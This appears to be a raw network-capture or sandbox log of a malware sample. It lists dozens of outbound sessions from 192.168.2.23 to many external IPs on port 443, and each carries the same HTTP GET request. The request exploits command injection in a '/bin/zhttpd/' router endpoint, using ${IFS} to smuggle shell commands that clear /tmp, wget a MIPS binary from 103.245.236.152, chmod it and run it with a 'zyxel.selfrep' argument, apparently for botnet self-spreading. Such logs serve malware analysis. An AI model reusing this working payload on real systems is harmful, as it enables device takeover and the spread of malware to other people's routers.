                                            Jan 14, 2024 15:50:37.377944946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3765192.168.2.235835093.4.185.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.377962112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3766192.168.2.2337710168.129.43.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378002882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3767192.168.2.2357476182.117.219.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378045082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3768192.168.2.233373237.100.131.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378077984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3769192.168.2.2356870149.34.8.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378101110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3770192.168.2.2345592204.185.253.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378114939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3771192.168.2.23539229.10.244.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378169060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3772192.168.2.2343080203.120.113.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378204107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3773192.168.2.2343242221.96.26.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378238916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3774192.168.2.233711281.98.208.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378254890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3775192.168.2.2339604181.59.116.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378273964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3776192.168.2.2359456182.203.179.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378331900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3777192.168.2.236012885.14.124.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378365993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3778192.168.2.234905699.75.41.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378418922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3779192.168.2.2356064128.157.132.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378446102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3780192.168.2.2345824170.128.128.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378470898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3781192.168.2.2342170155.159.93.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378506899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3782192.168.2.2339930151.38.243.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378562927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3783192.168.2.2350020168.72.95.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378596067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3784192.168.2.235255260.203.25.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378633022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3785192.168.2.2345466114.69.14.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.378659010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3786192.168.2.2337686106.252.234.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380487919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3787192.168.2.235528440.90.187.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380578995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3788192.168.2.235042687.71.100.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380603075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3789192.168.2.235431896.82.184.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380665064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3790192.168.2.233751270.208.47.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380672932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3791192.168.2.2342892103.219.91.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380712986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3792192.168.2.2350306128.66.243.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380767107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3793192.168.2.235619852.225.144.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380888939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3794192.168.2.234992697.9.87.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.380908966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3795192.168.2.2357256136.143.230.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.381200075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3796192.168.2.2340576170.124.20.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382330894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3797192.168.2.2351256202.29.40.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382411003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3798192.168.2.236064288.193.172.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382462978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3799192.168.2.235193412.42.168.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382474899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3800192.168.2.2340216162.237.55.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382493019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3801192.168.2.2355676203.52.14.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382523060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3802192.168.2.2354618191.118.187.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382540941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3803192.168.2.2341394186.206.66.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382548094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3804192.168.2.235228223.30.255.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382590055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3805192.168.2.2333354111.91.198.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382613897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3806192.168.2.234127663.199.158.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382649899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3807192.168.2.234363243.133.113.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382673979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3808192.168.2.2337028137.108.190.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382699013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3809192.168.2.2341070120.37.165.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382729053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3810192.168.2.2345546186.74.71.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382750034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3811192.168.2.2353088223.189.227.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382771969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3812192.168.2.23585064.230.107.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382800102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3813192.168.2.235197663.47.114.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382833958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3814192.168.2.234055612.43.211.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382850885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3815192.168.2.2334744109.7.247.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382853985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3816192.168.2.2336842195.5.123.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382863998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3817192.168.2.234148862.200.36.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382879972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3818192.168.2.2348250129.138.163.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382908106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3819192.168.2.2353510158.157.125.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.382955074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3820192.168.2.233687654.3.238.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383044958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3821192.168.2.233328690.118.18.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383050919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3822192.168.2.2343312161.224.71.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383066893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3823192.168.2.233360225.67.183.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383126974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3824192.168.2.236088246.145.128.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383157015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3825192.168.2.2339318168.91.123.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383173943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3826192.168.2.2354526185.107.1.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.383194923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3827192.168.2.2357468101.106.165.176443
                                            TimestampBytes transferredDirectionData
